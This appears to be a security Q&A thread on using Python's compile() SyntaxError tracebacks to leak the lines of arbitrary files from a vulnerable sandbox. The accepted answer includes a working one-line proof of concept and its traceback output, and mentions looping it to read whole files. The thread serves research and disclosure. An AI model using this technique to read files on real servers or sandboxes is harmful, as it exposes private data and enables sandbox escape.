Leak multiple lines from file

Question

I am researching this bug here, where the first line of an arbitrary file can be leaked by triggering a SyntaxError using the compile() function.

Is there a method of leaking the rest of the file, such as similar to the way Heartbleed leaks data from server memory?

In Heartbleed, you can open a listener port on your computer and spam the targeted server with a specially crafted request to leak the response bit-by-bit.

I am using a vulnerable python sandbox hosted on a server. The code is compiled on the server. With the bug above I can leak the first line of any file. Is there a way, using only builtins and the standard library to leak the remaining lines of the file?

@MechMK1 Edited the question to clarify. Sorry, my bad I didn't realise I typed 'files'. — isopach, Oct 09 '19 at 10:16
truncate the first line then re-"compile"? That would appear to be the most obvious approach. — schroeder, Oct 09 '19 at 12:27

score 1 · Accepted Answer · answered Dec 07 '19 at 01:04

I posted about it on the python bug tracker and got some advice.

Since python interprets files line-by-line, we can delay the termination error, which leads to this interesting bug, simply by adding a new line \n to leak a line at a time.

The proof of concept is as follows:

Create target File

$ cat /tmp/passwd
line 1
line 2
line 3
line 4

Read from target File

$ python -c 'compile("\n\n\nyield", "/tmp/passwd", "exec")'
Traceback (most recent call last):
  File "<string>", line 1, in <module>
  File "/tmp/passwd", line 4
    line 4
    ^
SyntaxError: 'yield' outside function

By writing a simple catch loop, it is possible to leak all lines of an unknown file on the system. However, as stated by a reviewer on the tracker, this is only practical for a sandbox escape. Even though Python isn't built for sandboxing, if someone were to implement one, the compile function must be among the first to go.

Leak multiple lines from file

1 Answers1